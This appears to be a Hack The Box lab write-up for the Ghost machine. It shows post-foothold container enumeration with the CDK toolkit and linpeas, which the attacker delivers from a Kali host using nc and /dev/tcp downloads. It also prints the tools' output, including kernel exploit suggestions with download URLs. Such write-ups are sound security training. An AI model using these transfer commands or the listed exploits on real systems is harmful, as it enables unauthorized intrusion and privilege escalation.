InfoSec LAB

Ghost_Automated_LINUX-DEV-WS01

Created: 5 min read

CDK - Zero Dependency Container Penetration Toolkit

Conducting an automated enumeration after performing the manual enumeration

cdk is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nc -lvp 2222 < cdk
listening on [any] 2222 ...
connect to [10.10.14.61] from dc01.ghost.htb [10.10.11.24] 50470
 
florence.ramirez@LINUX-DEV-WS01:/dev/shm$ cat < /dev/tcp/10.10.14.61/2222 > cdk
florence.ramirez@LINUX-DEV-WS01:/dev/shm$ chmod 755 ./cdk

Delivery complete

Exec

florence.ramirez@LINUX-DEV-WS01:/var/tmp$ ./cdk eva --full
CDK (Container DucK)
CDK Version(GitCommit): 306f3ced50188ab2c41e0e924c1cde35ecbb520d
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2024/07/16 12:19:58 current dir: /var/tmp
2024/07/16 12:19:58 current user: florence.ramirez uid: 50 gid: 50 home: /home/GHOST/florence.ramirez
2024/07/16 12:19:58 hostname: LINUX-DEV-WS01
2024/07/16 12:19:58 debian debian 12.4 kernel: 5.15.0-113-generic
2024/07/16 12:19:58 Setuid files found:
	/usr/bin/chfn
	/usr/bin/chsh
	/usr/bin/gpasswd
	/usr/bin/ksu
	/usr/bin/mount
	/usr/bin/newgrp
	/usr/bin/passwd
	/usr/bin/su
	/usr/bin/umount
	/bin/chfn
	/bin/chsh
	/bin/gpasswd
	/bin/ksu
	/bin/mount
	/bin/newgrp
	/bin/passwd
	/bin/su
	/bin/umount
 
[  Information Gathering - Services  ]
2024/07/16 12:19:58 sensitive env found:
	SSH_CONNECTION=172.18.0.3 47574 172.18.0.2 22
2024/07/16 12:19:58 sensitive env found:
	SSH_CLIENT=172.18.0.3 47574 22
2024/07/16 12:19:58 sensitive env found:
	SSH_TTY=/dev/pts/1
2024/07/16 12:19:58 service found in process:
	17	1	sshd
2024/07/16 12:19:58 service found in process:
	45	17	sshd
2024/07/16 12:19:58 service found in process:
	57	45	sshd
 
[  Information Gathering - Commands and Capabilities  ]
2024/07/16 12:19:58 available commands:
	find,ps,python3,apt,dpkg,ssh,vi,mount,base64,perl
2024/07/16 12:19:58 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	0000000000000000
	CapPrm:	0000000000000000
	CapEff:	0000000000000000
	CapBnd:	00000000a80425fb
	CapAmb:	0000000000000000
	Cap decode: 0x0000000000000000 = 
[*] Maybe you can exploit the Capabilities below:
 
[  Information Gathering - Mounts  ]
0:51 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/725B6B5II5A6B2BUBPAAR6PVUN:/var/lib/docker/overlay2/l/2MRQIAYMMVQVUUQT6GE6TOSXNX:/var/lib/docker/overlay2/l/7AQAEJZWSPPSU6OKQ2P4QTBILD:/var/lib/docker/overlay2/l/HK62N2BGDDQTAVFTTYYB7B3SFJ:/var/lib/docker/overlay2/l/YPG4YGUYUATS3XUZPBV2EMK7XP:/var/lib/docker/overlay2/l/MVLH5UYXDPXTZCVLFXQASRJ3QT:/var/lib/docker/overlay2/l/YFCODJLKW7KWUAS4HAIPSBRHQ2:/var/lib/docker/overlay2/l/WUKUZKIH63RTIO7QXTVKYC2VK3:/var/lib/docker/overlay2/l/3H27Q5UHV63OSNSQLHC63EGQW2,upperdir=/var/lib/docker/overlay2/1f786bd15fdb20fd89e46cd0032588802eeb98b1169a6003eff9e3c59be75ebb/diff,workdir=/var/lib/docker/overlay2/1f786bd15fdb20fd89e46cd0032588802eeb98b1169a6003eff9e3c59be75ebb/work
0:102 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:103 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=286478,mode=755,inode64
0:104 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:105 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:97 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:106 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,nr_inodes=286478,inode64
8:2 /var/lib/docker/containers/c2ea6871e69c5314b2aab666e811d390433459358f8f678e6ac65ccebe5fc856/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/c2ea6871e69c5314b2aab666e811d390433459358f8f678e6ac65ccebe5fc856/hostname /etc/hostname rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/c2ea6871e69c5314b2aab666e811d390433459358f8f678e6ac65ccebe5fc856/hosts /etc/hosts rw,relatime - ext4 /dev/sda2 rw
0:102 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:102 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:102 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:102 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:102 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:115 / /proc/acpi ro,relatime - tmpfs tmpfs ro,size=1145912k,nr_inodes=286478,inode64
0:103 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=286478,mode=755,inode64
0:103 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=286478,mode=755,inode64
0:103 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,nr_inodes=286478,mode=755,inode64
0:116 / /proc/scsi ro,relatime - tmpfs tmpfs ro,size=1145912k,nr_inodes=286478,inode64
0:117 / /sys/firmware ro,relatime - tmpfs tmpfs ro,size=1145912k,nr_inodes=286478,inode64
0:118 / /sys/devices/virtual/powercap ro,relatime - tmpfs tmpfs ro,size=1145912k,nr_inodes=286478,inode64
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2024/07/16 12:19:58 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
 
[  Discovery - K8s API Server  ]
2024/07/16 12:20:14 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2024/07/16 12:20:15 failed to dial Alibaba Cloud API.
2024/07/16 12:20:16 failed to dial Azure API.
2024/07/16 12:20:17 failed to dial Google Cloud API.
2024/07/16 12:20:18 failed to dial Tencent Cloud API.
2024/07/16 12:20:19 failed to dial OpenStack API.
2024/07/16 12:20:20 failed to dial Amazon Web Services (AWS) API.
2024/07/16 12:20:21 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
2024/07/16 12:20:21 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
 
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/.bashrc - /etc/skel/.bashrc
	/.bash_history - /home/GHOST/florence.ramirez/.bash_history
 
[  Information Gathering - ASLR  ]
2024/07/16 12:20:24 /proc/sys/kernel/randomize_va_space file content: 2
2024/07/16 12:20:24 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2024/07/16 12:20:24 /proc/1/cgroup file content:
	0::/
2024/07/16 12:20:24 /proc/self/cgroup file added content (compare pid 1) :

Network

florence.ramirez@LINUX-DEV-WS01:/var/tmp$ ./cdk ifconfig
2024/07/16 12:20:56 [+] run ifconfig, using GetLocalAddresses()
2024/07/16 12:20:56 lo 127.0.0.1/8
2024/07/16 12:20:56 lo ::1/128
2024/07/16 12:20:56 eth0 172.18.0.2/16

172.18.0.2/16

florence.ramirez@LINUX-DEV-WS01:/var/tmp$ ./cdk netstat
2024/07/16 12:21:32 [+] run netstat, using RunNestat()
ipType		connection	localAddr			status			remoteAddr			pid
ipv4		tcp		0.0.0.0:139     		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		127.0.0.11:38951		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		0.0.0.0:22      		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		0.0.0.0:445     		LISTEN       		0.0.0.0:0       		0
ipv4		tcp		172.18.0.2:46090		ESTABLISHED  		10.0.0.254:49669		0
ipv4		tcp		172.18.0.2:53998		ESTABLISHED  		10.0.0.254:445  		0
ipv4		tcp		172.18.0.2:34686		ESTABLISHED  		10.0.0.254:50495		0
ipv4		tcp		172.18.0.2:22   		ESTABLISHED  		172.18.0.3:47574		0
ipv4		udp		0.0.0.0:137     		NONE         		0.0.0.0:0       		0
ipv4		udp		172.18.0.2:138  		NONE         		0.0.0.0:0       		0
ipv4		udp		0.0.0.0:138     		NONE         		0.0.0.0:0       		0
ipv4		udp		172.18.0.2:137  		NONE         		0.0.0.0:0       		0
ipv4		udp		172.18.255.255:137		NONE         		0.0.0.0:0       		0
ipv4		udp		127.0.0.11:37905		NONE         		0.0.0.0:0       		0
ipv4		udp		172.18.255.255:138		NONE         		0.0.0.0:0       		0

PEAS

Conducting an automated enumeration after performing the manual enumeration

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nc -lvp 2222 < linpeas_CVE_check.sh
listening on [any] 2222 ...
connect to [10.10.14.61] from dc01.ghost.htb [10.10.11.24] 57010
 
florence.ramirez@LINUX-DEV-WS01:/var/tmp$ cat < /dev/tcp/10.10.14.61/2222 > linpeas_CVE_check.sh
florence.ramirez@LINUX-DEV-WS01:/var/tmp$ chmod 755 linpeas_CVE_check.sh

Delivery complete

Executing PEAS

CVEs

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
earch/master/pocs/linux/cve-2021-22555/exploit.com/google/security-res
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

ENV

Container

Entrypoint

DNS

SSH

kadmin

Interactive Graph View

Backlinks